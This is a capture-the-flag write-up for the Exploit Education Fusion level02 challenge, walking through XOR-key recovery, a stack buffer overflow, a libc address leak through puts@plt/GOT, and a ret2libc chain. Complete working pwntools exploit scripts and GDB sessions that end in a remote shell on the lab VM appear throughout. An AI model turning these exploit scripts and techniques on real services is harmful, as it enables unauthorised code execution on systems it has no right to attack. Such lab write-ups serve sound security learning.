This level deals with some basic obfuscation / math stuff.

This level introduces non-executable memory and return into libc / .text / return orientated programming (ROP).

The description and source code can be found here:
http://exploit.education/fusion/level02/

Contents

1 Source Code Analysis

2 Interacting With The Program

3 Cheating

4 Leaking Libc Address

4.1 Side Note

5 Exploitation

Source Code Analysis

For this level, I looked at the source code and came up with a plan of attack before even launching the Fusion VM. Let’s step through it. I won’t bother with main() as its only relevant purpose is to call the encrypt_file() function. That function may look kinda long, but it’s actually pretty simple.

void encrypt_file() {
  // http://thedailywtf.com/Articles/Extensible-XML.aspx
  // maybe make bigger for inevitable xml-in-xml-in-xml ?
  unsigned char buffer[32 * 4096];

  unsigned char op;
  size_t sz;
  int loop;

  printf("[-- Enterprise configuration file encryption service --]\n");
  
  loop = 1;
  while(loop) {
      nread(0, &op, sizeof(op));
      switch(op) {
          case 'E':
              nread(0, &sz, sizeof(sz));
              nread(0, buffer, sz);
              cipher(buffer, sz);
              printf("[-- encryption complete. please mention "
              "474bd3ad-c65b-47ab-b041-602047ab8792 to support "
              "staff to retrieve your file --]\n");
              nwrite(1, &sz, sizeof(sz));
              nwrite(1, buffer, sz);
              break;
          case 'Q':
              loop = 0;
              break;
          default:
              exit(EXIT_FAILURE);
      }
  }
}

I’m not sure why those comments at the start of the function are there; they don’t seem very relevant. Anyway, a few things are happening:

Several variables are declared (buffer, op, sz, and loop).
A greeting message is printed.
A while loop begins, checking the “loop” variable (it keeps looping as long as it’s not 0).
One byte of user input is read into the “op” (operation) variable.
If that input was “E” then:

Read the “sz” variable from user input. This is the number of bytes to read and encrypt, and it is never checked against the size of “buffer”.
Read “sz” bytes of user input into “buffer”. This is the data we want encrypted.
Call the cipher() function.
Print a message when the encryption is complete.
Write the size to stdout.
Write the encrypted data to stdout.

If “Q” was entered, set “loop” to 0 so the loop ends and the function returns. Anything else calls exit() straight away.

You may have noticed the vulnerability here. The user controls how many bytes are read. Even though there are 131,072 bytes (32 * 4096) allocated to the “buffer” variable, it doesn’t matter, as the user can simply specify a larger size and write past the end of it.

The cipher() function is a bit more complex, even though it’s not a proper encryption algorithm.

void cipher(unsigned char *blah, size_t len) {
  static int keyed;
  static unsigned int keybuf[XORSZ];

  int blocks;
  unsigned int *blahi, j;

  if(keyed == 0) {
      int fd;
      fd = open("/dev/urandom", O_RDONLY);
      if(read(fd, &keybuf, sizeof(keybuf)) != sizeof(keybuf))
        exit(EXIT_FAILURE);
      close(fd);
      keyed = 1;
  }

  blahi = (unsigned int *)(blah);
  blocks = (len / 4);
  if(len & 3) blocks += 1;

  for(j = 0; j < blocks; j++) {
      blahi[j] ^= keybuf[j % XORSZ];
  }
}

Variables are declared (keyed, keybuf, blocks, blahi, and j, plus the blah and len parameters).
If the “keyed” variable is equal to 0 (i.e. no key has been generated yet), then do the following:

Open the “/dev/urandom” file.
Read sizeof(keybuf) bytes from “/dev/urandom” into the “keybuf” variable. XORSZ is defined as 32 elsewhere in the level’s source, so that’s 32 unsigned ints, or 128 bytes.
Set the “keyed” variable to 1.

Set “blahi” (an unsigned int pointer) to point to “blah” (the data to encrypt).
Set the “blocks” variable to be the user-supplied length (“len” variable) divided by 4.
If the “len” variable is not divisible by 4, then add 1 to the “blocks” variable.
Run a for loop that performs the encryption, 4 bytes at a time (keybuf & blahi are unsigned ints).

This encryption “algorithm” will simply XOR the data with whatever is in “keybuf”
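For anyone who thinks better in Python, here is a rough port of cipher() as a sketch. It assumes XORSZ is 32 (the macro is defined outside the snippet above) and takes the key as a parameter instead of reading /dev/urandom. The name cipher_model and the dummy key are mine, purely for illustration.

```python
import struct

XORSZ = 32  # assumption: value of the XORSZ macro in the level's source


def cipher_model(data: bytes, key_words: list) -> bytes:
    """XOR data with a repeating key, one 32-bit little-endian word at a time."""
    blocks = len(data) // 4
    if len(data) & 3:
        blocks += 1  # a partial trailing word still counts as a block
    # The C code XORs in place and would touch bytes past len here;
    # this model pads with zeros and trims the result instead.
    padded = data.ljust(blocks * 4, b"\x00")
    words = struct.unpack(f"<{blocks}I", padded)
    out = [w ^ key_words[j % XORSZ] for j, w in enumerate(words)]
    return struct.pack(f"<{blocks}I", *out)[:len(data)]


key_words = list(range(1, XORSZ + 1))  # dummy key, for illustration only
once = cipher_model(b"hello world", key_words)
twice = cipher_model(once, key_words)
print(twice)  # b'hello world' (XOR with the same key undoes itself)
```

The important property is the last line: running the same data through the function twice with the same key gives back the original, which is what makes the rest of the attack possible.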

While there is an obvious buffer overflow vulnerability, the problem is that whatever data you send will be XOR’ed with a random key. After looking at the source code for a while, I did spot one more mistake. If the cipher() function is called multiple times within a connection, the key will be the same each time. Both “keyed” and “keybuf” are declared static, so they start out zeroed and keep their values between calls; the key is only generated on the first call. So, I should be able to send known data, take the encrypted form, XOR the two together, and get the key. Then, I can overwrite the saved EIP value with an “encrypted” address so that when the encryption happens on it, the desired “unencrypted” address will be left.
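The key-recovery idea can be tried offline before touching the VM. The sketch below uses a random local key as a stand-in for the server’s keybuf and assumes a 128-byte key (XORSZ = 32 four-byte ints). The helper xor_repeat is a hypothetical name of mine, not something from the level.

```python
import os


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR data against key, repeating the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


KEY_LEN = 128  # assumption: sizeof(keybuf) with XORSZ = 32 and 4-byte ints

secret_key = os.urandom(KEY_LEN)          # stands in for the server's keybuf
known = b"A" * KEY_LEN                    # plaintext we choose
returned = xor_repeat(known, secret_key)  # what the service would send back

# Known plaintext XOR ciphertext gives the key.
recovered = xor_repeat(known, returned)
assert recovered == secret_key

# Pre-"encrypt" the bytes we want to end up in memory...
wanted = b"\xde\xad\xbe\xef" * 40
to_send = xor_repeat(wanted, recovered)
# ...so that the server's own XOR pass turns them back into `wanted`.
assert xor_repeat(to_send, secret_key) == wanted
```

Working byte by byte gives the same result as the C code’s word-at-a-time XOR, since XOR never carries between bytes.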

Interacting With The Program

The next step is to figure out how the program was intended to be used. This was a bit harder than I expected, and I couldn’t get it to work by simply using netcat and manually entering the expected input. One reason for this is that the “sz” (size) variable it’s expecting is a raw 4-byte integer. If I type “58” as input, the program receives the ASCII bytes “\x35\x38” rather than the number 58. What I need to send is “\x3a\x00\x00\x00” (58 as a little-endian 32-bit value). That, coupled with figuring out where it wanted a newline character, made this a tedious task of trial and error. I suppose it wouldn’t have taken so long if I understood the C language a bit better, but such is life. Anyway, here’s a script I came up with to interact with the program in its intended fashion:

#!/usr/bin/env python3

from pwn import *

io = remote("fusion", 20002)

data = b"Lorem ipsum dolor sit amet, consectetur adipiscing elit."
print(io.recvline().decode())    # greeting banner
io.send(b"E")                    # operation byte
io.send(p32(len(data)))          # sz as a raw 4-byte little-endian integer
io.send(data)

print(io.recvline().decode())    # "encryption complete" message
size = u32(io.recvn(4))          # the service echoes sz back first
encrypted = io.recvn(size)       # then exactly sz bytes of XOR'ed data

log.info(f"Size = {size}")
log.info("Encrypted message:")
print(encrypted)
print()
io.close()

andrew ~/fusion/level02 $ ./level02_test.py 
[+] Opening connection to fusion on port 20002: Done
[-- Enterprise configuration file encryption service --]

[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]

[*] Size = 56
[*] Encrypted message:
b"\x8b\xc7\x86\xfe.\x17\xb0\xd1\x04\xdb&\x10%n\xa6Bg_`\xce\xa7\x14\x9c \xce\x82\x93\x14\xef\xc7.M\xa3\xd7{d'\xef\xb7\xa2\x0e\xce\xa3\xb5\x90\xd4\xf5.j\x15[\x9d\nH\x18z"

[*] Closed connection to fusion port 20002
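To make the size-field problem from earlier concrete, here is a small standalone sketch of what typing a number into netcat sends versus what the service expects. It assumes sz is 4 bytes wide, as it would be on this 32-bit target. The "58\nL" case is a hypothetical of mine showing what happens if the typed digits, the newline, and the first data byte get read as sz.

```python
import struct

size = 58

typed = b"58"                      # what typing 58 into netcat sends
packed = struct.pack("<I", size)   # what nread(0, &sz, sizeof(sz)) expects

print(typed)    # b'58'  (bytes 0x35 0x38)
print(packed)   # b':\x00\x00\x00'  (0x3a is the ':' character)

# Hypothetical: ASCII digits, a newline, and one data byte consumed as sz.
misread = struct.unpack("<I", b"58\nL")[0]
print(hex(misread))  # 0x4c0a3835, far larger than the 131072-byte buffer
```

The packed form is the same thing the scripts build with (len(data)).to_bytes(4, "little") or pwntools’ p32().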

Now that I’ve got that working, I’ll start building out the attack. I’ll use a “ret2libc” technique to bypass both ASLR and NX protections.

Cheating

I like to build my exploits (or any script I write) and test them incrementally so that if something goes wrong, I’ll have a better idea of what the problem was. First, I’ll write the exploit pretending that ASLR is not enabled. I plan to create a ROP chain that calls system() with a “/bin/sh” string passed to it. Normally, with ASLR enabled, the address of system() would be randomized (along with everything else in libc) and you’d have no way of knowing it when attacking a remote machine. In this case, I know that the parent process for “level02” is not restarted each time a connection is made & closed. This means that I can attach to the process with GDB, print the address of system(), and use that in my ROP chain knowing that it won’t change (until I restart the VM or the parent process).

Getting the address of system():

fusion@fusion ~ $ ps aux | grep level02
20002     1201  0.0  0.0   1816    52 ?        Ss   05:44   0:00 /opt/fusion/bin/level02
fusion    1463  0.0  0.0   4184   796 pts/0    S+   05:45   0:00 grep --color=auto level02

fusion@fusion ~ $ sudo gdb -q -p 1201
[sudo] password for fusion:
warning: not using untrusted file "/home/fusion/.gdbinit"
Attaching to process 1201
Reading symbols from /opt/fusion/bin/level02...done.
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb77cb424 in __kernel_vsyscall ()

(gdb) p system
$1 = {<text variable, no debug info>} 0xb767fb20 <__libc_system>

(gdb) p exit
$2 = {<text variable, no debug info>} 0xb76759e0 <__GI_exit>

(gdb) find 0xb767fb20, +9999999, "/bin/sh"
0xb777b8da
warning: Unable to access target memory at 0xb77bdf62, halting search.
1 pattern found.

I also grabbed the address of exit() so the program will cleanly exit when I close the shell. It’s not necessary here, but why not create good habits? I also did a search for a “/bin/sh” string starting at the address of system(). This will also be randomized but I can just hard-code it into my script for now.

Here’s the “cheat” exploit:

#!/usr/bin/env python3

from pwn import *


def encrypt(data):
    """Send one 'E' request and return the XOR'ed bytes the service echoes back."""
    io.send(b"E")
    io.send(p32(len(data)))     # sz as a raw 4-byte little-endian integer
    io.send(data)

    print(io.recvline().decode())
    size = u32(io.recvn(4))     # the service writes sz back first
    return io.recvn(size)       # then exactly sz bytes of data


io = remote("fusion", 20002)
print(io.recvline().decode())

# Known-plaintext step: 128 bytes in, XOR with what comes back, key out.
data = b"A" * 128
encrypted = encrypt(data)
key = bytes(a ^ b for a, b in zip(data, encrypted))

payload  = b"A" * 131088
payload += p32(0xb767fb20)  # Address of system()
payload += p32(0xb76759e0)  # Address of exit()
payload += p32(0xb777b8da)  # Address of "/bin/sh"

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))

encrypt(enc_data)

io.send(b"Q")  # ends the loop so encrypt_file() returns into the chain
io.interactive()

At this point, I shouldn’t have to explain how to find the offset of the saved return address (the 131088 number). You can see that I have the 3 addresses in my ROP chain. The address for exit() comes after system() so that when system() hits ret, it’ll pop the address for exit() into EIP and cleanly exit the program. The address for the “/bin/sh” string is last because system() will look to ESP+4 for an argument.
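As a sketch of the layout described above, the snippet below builds the same payload without pwntools and prints which stack slot each address lands in. The addresses are the ones from my GDB session, so they only hold until the parent process restarts. The local p32 is a stand-in for the pwntools function of the same name.

```python
import struct

OFFSET = 131088  # distance from the start of buffer to the saved return address


def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian word (stand-in for pwntools' p32)."""
    return struct.pack("<I", value)


chain = [
    ("saved return address -> system()", 0xb767fb20),
    ("system()'s return address -> exit()", 0xb76759e0),
    ("system()'s first argument -> \"/bin/sh\"", 0xb777b8da),
]

payload = b"A" * OFFSET + b"".join(p32(addr) for _, addr in chain)

for i, (role, addr) in enumerate(chain):
    print(f"buffer+{OFFSET + 4 * i}: {addr:#010x}  {role}")
```

When encrypt_file() returns, ret pops the first word into EIP. From system()’s point of view the next word sits at ESP (its return address) and the one after that at ESP+4 (its argument), exactly as if it had been called normally.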

Testing it out:

andrew ~/fusion/level02 $ ./level02_system.py 
[+] Opening connection to fusion on port 20002: Done
[-- Enterprise configuration file encryption service --]

[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]

[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]

[*] Switching to interactive mode
$ id
uid=20002 gid=20002 groups=20002

Leaking Libc Address

The next step is to figure out how to get the base address of libc. I used this blog post by @D4mianWayne to get a better understanding of ret2libc attacks and leaking the libc address:
https://d4mianwayne.github.io/posts/ret2libc-pwntools

That post explains exactly what I’ll need to do for this challenge, with the only difference being the architecture. That post uses an x64 binary, so function arguments are passed in registers instead of on the stack.

The idea here is to overwrite the saved return address on the stack with the address of puts@plt while passing a single argument to that “call”: the address of puts@got. After you send that payload, puts() prints the raw bytes stored at that GOT entry, and the first four of them should be the runtime address of puts(). You can use that to calculate the base address of libc. Looking at the symbols in libc, you can find the offset of puts() and subtract it from the address that was leaked. This gives you libc’s base address, from which you can calculate the actual address of any other function. Just find its offset and add that to the base address.

First, I’ll get the PLT and GOT addresses for puts() in the level02 binary:

fusion@fusion ~ $ objdump -d /opt/fusion/bin/level02 | grep -A1 puts
08048930 <puts@plt>:
 8048930:       ff 25 b8 b3 04 08       jmp    *0x804b3b8
...

This shows that the PLT address is 0x8048930 and GOT address is 0x804b3b8.

Now I’ll need to find the puts() offset within libc. To determine which libc binary is being used by this process, I can attach to it with GDB again:

fusion@fusion ~ $ sudo gdb -q -p 1201
[sudo] password for fusion: 
warning: not using untrusted file "/home/fusion/.gdbinit"
Attaching to process 1201
Reading symbols from /opt/fusion/bin/level02...done.
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb77cb424 in __kernel_vsyscall ()

(gdb) info sharedlibrary 
From        To          Syms Read   Shared Object Library
0xb7659be0  0xb7766784  Yes         /lib/i386-linux-gnu/libc.so.6
0xb77cc830  0xb77e35cf  Yes (*)     /lib/ld-linux.so.2
(*): Shared library is missing debugging information.

While I’m here, I’m going to get the actual puts() address so I can verify my results later on:

(gdb) p puts
$1 = {<text variable, no debug info>} 0xb76a33b0 <_IO_puts>

To get the offset of puts(), I can use readelf to list the symbols in libc and grep for “puts”:

fusion@fusion ~ $ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " puts@"
   423: 000603b0   444 FUNC    WEAK   DEFAULT   12 puts@@GLIBC_2.0
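With a runtime address and an offset in hand, the base calculation is a single subtraction. Here it is as a quick sanity check, using the puts() address GDB printed above and the readelf offset. The page-alignment test is an extra check of my own and assumes 4 KiB pages.

```python
puts_runtime = 0xb76a33b0   # from `p puts` in GDB above
puts_offset = 0x000603b0    # from readelf above

libc_base = puts_runtime - puts_offset
print(hex(libc_base))            # 0xb7643000
print(libc_base & 0xfff == 0)    # True: a sane base is page-aligned
```

If the result were not page-aligned, that would be a strong hint that the offset came from a different libc build than the one the process has loaded.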

Now I need to modify my Python script to capture the address:

#!/usr/bin/env python3

from pwn import *

io = remote("fusion", 20002)

def encrypt(data):
    """Send one 'E' request and return the XOR'ed bytes the service echoes back."""
    io.send(b"E")
    io.send(p32(len(data)))     # sz as a raw 4-byte little-endian integer
    io.send(data)

    print(io.recvline().decode())
    size = u32(io.recvn(4))     # the service writes sz back first
    return io.recvn(size)       # then exactly sz bytes of data


print(io.recvline().decode())

# Known-plaintext step: 128 bytes in, XOR with what comes back, key out.
data = b"A" * 128
encrypted = encrypt(data)
key = bytes(a ^ b for a, b in zip(data, encrypted))

payload  = b"A" * 131088
payload += p32(0x08048930)  # Address of puts@plt
payload += b"AAAA"
payload += p32(0x0804b3b8)  # Address of puts@got

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))

encrypt(enc_data)

io.send(b"Q")              # return from encrypt_file() into puts@plt
puts_offset = 0x603b0
leak = u32(io.recvn(4))    # first 4 bytes puts() prints are the GOT entry
libc_base = leak - puts_offset
log.info(f"Leaked puts() address: {hex(leak)}")
log.info(f"Libc puts() offset:    {hex(puts_offset)}")
log.info(f"Libc base address:     {hex(libc_base)}")
print()
io.close()

Let’s run it:

andrew ~/fusion/level02 $ ./level02_puts.py 
[+] Opening connection to fusion on port 20002: Done
[-- Enterprise configuration file encryption service --]

[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]

[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]

[*] Leaked puts() address: 0xb76583b0
[*] Libc puts() offset:    0x603b0
[*] Libc base address:     0xb75f8000

[*] Closed connection to fusion port 20002

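That leaked address (0xb76583b0) is the same as the one GDB gave me on the Fusion VM for that run. (The GDB listing above shows 0xb76a33b0; it appears to come from a different boot of the VM, with libc at a different base, but the low three hex digits, 0x3b0, agree.)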

Side Note

What if I didn’t have access to the libc binary and didn’t know what version it was? Each version is bound to have different offsets from its base address. Well, after leaking the address of puts(), you could use a tool, like libc-database, to get the version of libc. For example, take the leaked puts() address (0xb76583b0) and do a search based on the last three hex digits:

andrew ~/libc-database (master) $ ./find puts 3b0
archive-old-eglibc (id libc6_2.13-20ubuntu5_i386)
archive-old-glibc (id libc6_2.5-0ubuntu14_amd64)
archive-old-glibc (id libc6-amd64_2.5-0ubuntu14_i386)

Since I got multiple results, I could either leak another address and add it to the search, or just use trial and error in my exploit. However, I happen to know that the actual libc version used here is that first result.
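The reason the last three hex digits are enough to search on is that libc is loaded at a page-aligned address, so randomization never changes the low 12 bits of a symbol’s address. A quick check with the values that appear in this post (assuming 4 KiB pages):

```python
PAGE_MASK = 0xfff  # assumption: 4 KiB pages, as on x86 Linux

leak_from_exploit = 0xb76583b0  # leaked by the script above
addr_from_gdb = 0xb76a33b0      # `p puts` in the GDB session
offset_in_libc = 0x603b0        # readelf

for value in (leak_from_exploit, addr_from_gdb, offset_in_libc):
    print(hex(value & PAGE_MASK))  # 0x3b0 each time
```

All three agree on 0x3b0 even though the two runtime addresses come from differently randomized libc mappings.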

Exploitation

I need a few more offsets to build this exploit. I’ll need the offset of exit() (to cleanly exit the program when the shell closes) and system():

fusion@fusion ~ $ readelf -s /lib/i386-linux-gnu/libc.so.6 | egrep " system| exit"
   135: 000329e0    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
  1409: 0003cb20   139 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0

And I’ll need the string “/bin/sh” to be somewhere in memory. I could generate a ROP chain to do this for me by using strcpy() to put certain bytes into a writable section (such as .bss). However, I know that the string I need is already in libc, so I can find the offset to it using strings:

fusion@fusion ~ $ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
 1388da /bin/sh
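Before wiring these offsets into the exploit, they can be cross-checked against the absolute addresses from the “Cheating” section, since those came from the same GDB session as the puts() address. This is just arithmetic on numbers already shown in this post. At exploit time the base comes from the leak instead.

```python
libc_base = 0xb76a33b0 - 0x603b0  # puts() address from GDB minus its readelf offset

offsets = {"system": 0x3cb20, "exit": 0x329e0, "/bin/sh": 0x1388da}
seen_in_gdb = {"system": 0xb767fb20, "exit": 0xb76759e0, "/bin/sh": 0xb777b8da}

for name, offset in offsets.items():
    resolved = libc_base + offset
    status = "ok" if resolved == seen_in_gdb[name] else "MISMATCH"
    print(f"{name:8} {resolved:#010x} {status}")
```

All three lines come out “ok”, which confirms that the readelf and strings offsets belong to the libc the process actually has mapped.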

Final exploit script:

#!/usr/bin/env python3

from pwn import *


def encrypt(data):
    """Send one 'E' request and return the XOR'ed bytes the service echoes back."""
    io.send(b"E")
    io.send(p32(len(data)))     # sz as a raw 4-byte little-endian integer
    io.send(data)

    print(io.recvline().decode())
    size = u32(io.recvn(4))     # the service writes sz back first
    return io.recvn(size)       # then exactly sz bytes of data


def get_key():
    """Recover this connection's XOR key from a known 128-byte plaintext."""
    print(io.recvline().decode())   # greeting banner
    data = b"A" * 128
    encrypted = encrypt(data)

    return bytes(a ^ b for a, b in zip(data, encrypted))


io = remote("fusion", 20002)
key = get_key()

payload  = b"A" * 131088
payload += p32(0x08048930)  # Address of puts@plt
payload += b"AAAA"
payload += p32(0x0804b3b8)  # Address of puts@got

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))
encrypt(enc_data)

io.send(b"Q")              # return from encrypt_file() into puts@plt
puts_offset = 0x603b0
leak = u32(io.recvn(4))    # first 4 bytes puts() prints are the GOT entry
libc_base = leak - puts_offset
io.close()

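# Now to get a shell. The key is recovered again for the new connection;
# libc_base is reused because the parent process has not restarted.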
io = remote("fusion", 20002)
key = get_key()

system_offset = 0x3cb20
exit_offset   = 0x329e0
binsh_offset  = 0x1388da

payload  = b"A" * 131088
payload += p32(libc_base + system_offset)
payload += p32(libc_base + exit_offset)
payload += p32(libc_base + binsh_offset)

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))
encrypt(enc_data)

io.send(b"Q")  # ends the loop so encrypt_file() returns into the chain
io.interactive()